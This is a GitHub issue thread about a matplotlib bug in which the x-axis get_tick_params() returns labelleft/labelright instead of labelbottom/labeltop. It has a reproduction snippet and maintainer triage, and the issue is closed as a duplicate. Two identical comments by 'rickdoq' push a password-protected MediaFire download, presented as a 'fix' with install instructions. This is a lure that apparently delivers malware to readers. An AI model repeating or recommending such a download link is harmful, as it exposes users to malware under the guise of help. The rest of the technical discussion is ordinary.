### ISSUE TITLE
[Bug]: `axes.get_tick_params()` does not return `labelbottom` or `labeltop`

### ISSUE THREAD

**Issue by GenieTim** [matplotlib/matplotlib#28772] opened 2024-08-31 06:22 UTC
### Bug summary

`axes.get_tick_params()` introduced in #23692 returns `labelright` and `labelleft` even for the x-axis, even though the keys should be called `labelbottom` or `labeltop`. This is confusing.

### Code for reproduction

```Python
import matplotlib.pyplot as plt

fig, ax = plt.subplots()
ax.tick_params(labelbottom=True, labeltop=True, labelright=True, labelleft=True)

tick_params = ax.get_xaxis().get_tick_params()
```

### Actual outcome

```
tick_params = {
"labelright": True,
"labelleft": True,
# ..., no `labelbottom` or `labeltop`
}
```

### Expected outcome

```
tick_params = {
"labelbottom": True,
"labeltop": True,
}
```

### Additional information

The code path to this bug seems relatively clear, see [here](https://github.com/matplotlib/matplotlib/pull/23692#discussion_r1705623450). Not sure though how to solve.

### Operating system

Windows, MacOS

### Matplotlib Version

3.9.1

### Python version

3.12.5

### Installation

pip

**Comment by rickdoq** [comment] 2024-08-31 06:30
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rickdoq** [comment] 2024-08-31 06:33
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rcomer** [comment] 2024-08-31 08:18
I can reproduce this with our `main` development branch and with v3.7.0 (when this method was introduced).  So it seems this has never worked correctly.

**Comment by rcomer** [comment] 2024-08-31 08:31
Marking as Good First Issue, because this should only require modifying the `kwtrans` dictionary here:
https://github.com/matplotlib/matplotlib/blob/3a0bc88a2d64bac47f5ba3e177d8e8359eb908dd/lib/matplotlib/axis.py#L1097-L1115

To check whether we're on the x- or y-axis, we can look at `self.axis_name`.

**Comment by MaozGelbart** [comment] 2024-09-12 10:54
Hi, I think this is reported in #27416 .

**Comment by rcomer** [comment] 2024-09-12 11:25
Thanks for flagging that @MaozGelbart!

**Closed** 2024-09-12 12:41 UTC
Labels: status: confirmed bug, status: duplicate, Good first issue, topic: ticks axis labels
